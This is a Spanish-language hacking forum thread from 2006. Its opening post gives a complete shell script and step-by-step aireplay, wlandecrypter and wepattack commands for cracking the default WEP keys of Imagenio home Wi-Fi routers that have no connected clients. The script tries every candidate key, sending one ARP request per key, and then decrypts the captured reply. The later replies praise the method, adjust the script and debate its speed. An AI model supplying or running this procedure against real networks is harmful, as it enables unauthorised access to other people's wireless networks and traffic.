elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
22 Marzo 2010, 03:59  


Temas destacados: Sigue las noticias más importantes de elhacker.net en Twitter! twitter


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless (Moderadores: Uxio, ChimoC, KARR)
| | |-+  descifrar redes IMAGENIO sin clientes y sin paquetes ;)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 Ir Abajo Imprimir
Autor Tema: descifrar redes IMAGENIO sin clientes y sin paquetes ;)  (Leído 33937 veces)
nilp0inter

Desconectado Desconectado

Mensajes: 125



Ver Perfil WWW
descifrar redes IMAGENIO sin clientes y sin paquetes ;)
« en: 13 Junio 2006, 02:10 »

ATENCIÓN: Este método esta obsoleto, prueba el nuevo wlaninject, es mucho más rápido:

¿Quien dijo que sin paquetes y sin clientes de ningun tipo no se podia crackear una wep? :o
El frotar se va a acabar chic@s! ;D

Con este script podeis conseguir paquetes en redes IMAGENIO sin necesidad de tener clientes wireless ni clientes cableados. La idea es muy sencilla, como no tenemos clientes ni paquetes el script se conecta a la red y prueba todas las claves posibles enviando una peticion arp por cada clave; por otra parte, usaremos aireplay para capturar los paquetes procedentes del AP (es decir, con el flag FromDS activado). Una vez que lo tengamos usamos el metodo "tradicional" con wepattack, wepdecrypt o weplab.


Necesitais:
wlandecrypter http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/5
arping2 http://www.habets.pp.se/synscan/programs.php?prog=arping
aireplay http://www.aircrack-ng.org/doku.php#download
wepattack https://sourceforge.net/project/showfiles.php?group_id=65063&release_id=119469
y linux (pregunta al friki mas cercano)

El codigo del script es el siguiente:
Código:
#!/bin/sh

#
# ENTRADAS:
#
# $1 : Interfaz
# $2 : Essid
# $3 : AP
# $4 : Channel
# $5 : keys.txt
#

if [ $# -lt 5 ]; then
echo "$0 '[Interfaz] [Essid] [AP] [Chan] [keys]'"
exit 1
fi
iwconfig $1 mode managed
iwconfig $1 essid $2
iwconfig $1 ap $3
iwconfig $1 channel $4
iwconfig $1 key s:AAAAAAAAAAAAA

echo -n " * Esperando conexion: "
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
        echo -n "."
        sleep 1;
done
echo " OK"

ifconfig $1 192.168.1.254

count=0
count_echo=0

for i in `cat $5`; do
iwconfig $1 key s:$i

while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
        echo -en "\r * Conexion perdida, esperando..."
        sleep 1;
done

arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
        count=$((count+1))
        count_echo=$((count_echo+1))
        if [ $count_echo -ge 50 ]; then
                echo -en "\r * Claves probadas: $count"
                count_echo=0
        fi
done
Este codigo lo puedes encontrar tambien en formato GunZip en http://www.megaupload.com/es/?d=DZPNE14W

Lo guardais como wlandestroy.sh o con otro nombre que os guste mas ;D .

Le dais permisos de ejecución ...
Código:
chmod u+x ./wlandestroy.sh

Y los pasos a seguir son los siguientes:
  • Buscais la red:
Usando airodump, kismet o el escaner que mas os guste. Necesitais el nombre de la red (ESSID) y la MAC del AP (BSSID)
  • Capturar paquete procedente del AP:
Para esto usaremos aireplay de la siguiente forma en una consola A PARTE:
[/list]
Código:
aireplay -4 -b {BSSID} -f1 ath0
Si el router es un Comtrend 536+ (00:16:38:XX:XX:XX) es conveniente usar
Código:
aireplay -4 -b {BSSID} -n86 -m86 -f1 ath0
para que solo pille las respuestas arp, porque este router es un poco cabroncete.
NOTA: Se puede usar de otras formas, yo he usado esta porque lo he probado esta mañana y no he andao investigando mas.
Si no os funciona usad ath0raw para capturar paquetes en vez de ath0
  • Generar el archivo de claves:
Para esto usamos wlandecrypter.
Código:
wlandecrypter {BSSID} {ESSID} {fichero_claves}
  • Probar todas las claves:
Usamos el script que he puesto arriba.
Código:
./wlandestroy.sh {INTERFAZ} {ESSID} {BSSID} {CANAL} {fichero_claves}
Cuando el script pase por la clave correcta el AP respondera con un arp y en la consola en la que esta el aireplay saldra un paquete, pulsais "y" para que se guarde y entonces el aireplay intentara hacer un chop-chop... pulsais Control+C para que no lo haga puesto que no nos interesa. Hacemos lo mismo en la consola donde esta el script para que no siga probando claves.
  • descifrar el paquete:
Ya tenemos el paquete en un archivo llamado replay_arp-XXXX-XXXXXX.cap. Usaremos wepattack para desencriptarlo:
Código:
wepattack -f replay_arp-XXXX-XXXXXX.cap -w {fichero_claves}

    El script tarda mas o menos segun cuales sean los digitos de la clave, porque los prueba secuencialmente desde 0000 hasta FFFF, es decir, si la clave es Z001349F644F9 tardara mas que si es Z0013490059F9. Como mucho a mi me ha tardado unos 10-15 minutos.


    NOTA: Este script solo funciona si la ip del router es 192.168.1.1, tambien podeis probar a sustituir la linea
    Código:
    arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
    por
    Código:
    arping2 -i$1 -c1 -w0 $3 > /dev/null 2>&1
    asi en vez de mandar la peticion arp a la ip 192.168.1.1 la intenta mandar a la mac del ap (esto no funciona siempre).
    No se os olvide que esto solo es posible para las redes con la clave que viene por defecto.

    Espero que os sea util...  ;D ;D ;D

    Referencia: http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/13
    « Última modificación: 21 Diciembre 2006, 18:23 por nilp0inter » En línea

    longits
    LT-23
    Colaborador

    Desconectado Desconectado

    Mensajes: 2.056


    LT-23


    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #1 en: 13 Junio 2006, 09:41 »

    Eres el mejor. Gracias!!!
    En línea

    Por favor, usa topics descriptivos.
    Por favor, cuida un poco la ortografía.

    Por favor, un mínimo de inteligencia emocional.
    Ture

    Desconectado Desconectado

    Mensajes: 18



    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #2 en: 13 Junio 2006, 09:49 »

    el puto amo! :D esta tarde lo pruebo y os cuento
    En línea
    Armenos

    Desconectado Desconectado

    Mensajes: 1.975



    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #3 en: 13 Junio 2006, 11:19 »

    Tocará probarlo cuando tenga un momento. Saludos y gracias.

    P.d. Un pequeño apunte: Para la gente vaga di de donde se puede bajar el aireplay (suite aircrack), arping2 y el wepattack. Muchas gracias de nuevo por tu trabajo.
    En línea
    fer.baguena

    Desconectado Desconectado

    Mensajes: 252


    "Necessity is the mother of invention"


    Ver Perfil WWW
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #4 en: 13 Junio 2006, 13:06 »

    Pero que te han hecho los de timofónica para que los trates así!  ;D ;D ;D ;D

    Muy buen trabajo!
    En línea

    El mejor placer de la vida es hacer lo que la gente te dice que no puedes hacer. (Walter Bage)
          ¡TERUEL EXISTE!
    *dudux
    Colaborador

    Desconectado Desconectado

    Mensajes: 2.374


    .....traficando con sueños.....


    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #5 en: 13 Junio 2006, 15:42 »

    cada vez más fácil............uyuyuyuyuuuuuuuuuu :rolleyes:

    yo me he bajado el arping de aqui ,,por si os interesa:::

    arping2
    ******
    http://ftp://ftp.habets.pp.se/pub/synscan/arping-2.01.tar.gz

    http://linux.org.by/debian/pool/main/a/arping/

    En línea

    Visita ....................    http://217.125.24.22/
    .NiXoN.

    Desconectado Desconectado

    Mensajes: 942


    Ubuntu user :D


    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #6 en: 13 Junio 2006, 15:55 »

    Wenas !!  ;D

    nilp0inter cada dia me sorprendes mas compañero  ;) Fántastico script !!  ;D Yalo provare  ;)

    Citar
    El Wlandecrypter 0.4

    El primer Wlandecrypter que version era?? :huh:

    cada vez más fácil............uyuyuyuyuuuuuuuuuu :rolleyes:

    yo me he bajado el arping de aqui ,,por si os interesa:::

    arping2
    ******
    http://ftp://ftp.habets.pp.se/pub/synscan/arping-2.01.tar.gz

    http://linux.org.by/debian/pool/main/a/arping/



    Gracias x los links *dudux a mas de uno le servira ;)

    Saludos !!  ;D
    En línea

    El que todo lo sabe sabe que no todo lo sabe


    nilp0inter

    Desconectado Desconectado

    Mensajes: 125



    Ver Perfil WWW
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #7 en: 13 Junio 2006, 16:08 »

    Una observación. Me he dado cuenta probando el script en una debian que cuando instalas el arping2 te lo instala como arping "a secas", asi que la linea
    Código:
    arping2 -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1
    sustituidla por
    Código:
    arping -i$1 -c1 -w0 192.168.1.1 > /dev/null 2>&1

    es decir, quitadle el "2". Y andando ;)
    En línea

    cacote10

    Desconectado Desconectado

    Mensajes: 94


    HaCkEd By Caco!


    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #8 en: 13 Junio 2006, 16:10 »

    muy bueno nilp0inter, alguna version para windows sacaras?  :D :D :D
    En línea

    nilp0inter

    Desconectado Desconectado

    Mensajes: 125



    Ver Perfil WWW
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #9 en: 13 Junio 2006, 16:32 »

    muy bueno nilp0inter, alguna version para windows sacaras?  :D :D :D
    Lo primero que voy a hacer es pasarlo a C porque asi es un poco bestia...
    Lo de windows quizas en un futuro, estoy algo liao con los examenes finales. ya terminando !!!!
    « Última modificación: 13 Junio 2006, 23:25 por nilp0inter » En línea

    Elena_FranciX

    Desconectado Desconectado

    Mensajes: 227


    Sin City


    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #10 en: 15 Junio 2006, 18:24 »

    ¿Quien dijo que sin paquetes y sin clientes de ningun tipo no se podia crackear una wep? 
    El frotar se va a acabar chic@s!

    Pos ale a frotar "codos" (por los examenes)

     ;D  a ver esos comentarios y pruebas foraneas....
    En línea

    cohone

    Desconectado Desconectado

    Mensajes: 194


    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #11 en: 15 Junio 2006, 18:55 »

    Citar
    Con este script podeis conseguir paquetes en redes IMAGENIO sin necesidad de tener clientes wireless ni clientes cableados. La idea es muy sencilla, como no tenemos clientes ni paquetes el script se conecta a la red y prueba todas las claves posibles enviando una peticion arp por cada clave; por otra parte, usaremos aireplay para capturar los paquetes procedentes del AP (es decir, con el flag FromDS activado). Una vez que lo tengamos usamos el metodo "tradicional" con wepattack, wepdecrypt o weplab.
    No se si me perdido algo..., pero si el router ya te responde a la petición arp de tu script, es porque ya sabes la key, no? Si en vez de hacer un arp , hicieras un ping al router, compruebas si responde, y en ese caso solo tendrías que mostrar la key desde tu script, sin necesidad de utilizar nada mas. o no?
    En línea
    nilp0inter

    Desconectado Desconectado

    Mensajes: 125



    Ver Perfil WWW
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #12 en: 15 Junio 2006, 22:23 »

    Citar
    No se si me perdido algo..., pero si el router ya te responde a la petición arp de tu script, es porque ya sabes la key, no? Si en vez de hacer un arp , hicieras un ping al router, compruebas si responde, y en ese caso solo tendrías que mostrar la key desde tu script, sin necesidad de utilizar nada mas. o no?

    El problema es que el numero de claves que te genra el wlandecrypter es un poco grande: 65535, y si hicieras un script que se conecte con la primera clave, envie un ping y espere una respuesta y luego cambie a la siguiente, etc tardaria muuuucho. Te lo digo porque lo he probado.

    Usando esta el arping y airepley a la vez, te ahorras estar conectado esperando la respuesta y asi te puedes centrar en enviar paquetes muy deprisa (cada vez que sale un punto "." se han probado 50 claves). Asi se agiliza mucho el proceso.

    De todas formas, si quieres probarlo de la otra manera modificar el script es muy facil. ;)

    Saludos
    En línea

    cohone

    Desconectado Desconectado

    Mensajes: 194


    Ver Perfil
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #13 en: 16 Junio 2006, 02:08 »

    Pues tienes razón, sólo con 1 seg de ping, tardaría más de 18h, no había caido en eso.
    En línea
    usb_enabled

    Desconectado Desconectado

    Mensajes: 437


    COLLEJATOR


    Ver Perfil WWW
    Re: descifrar redes IMAGENIO sin clientes y sin paquetes ;)
    « Respuesta #14 en: 17 Junio 2006, 03:44 »

    no tengo el wlandecrypter en linux...puedo generar el archivo de claves en windows y logo utilizarlo en linux?? en win como lo genero??
    En línea
    Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 Ir Arriba Imprimir 
    Ir a:  





    Consolas     La Web de Goku     MilW0rm     MundoDivx

    Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

    Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil

    Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

    Todas las webs afiliadas están libres de publicidad engañosa.

    Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC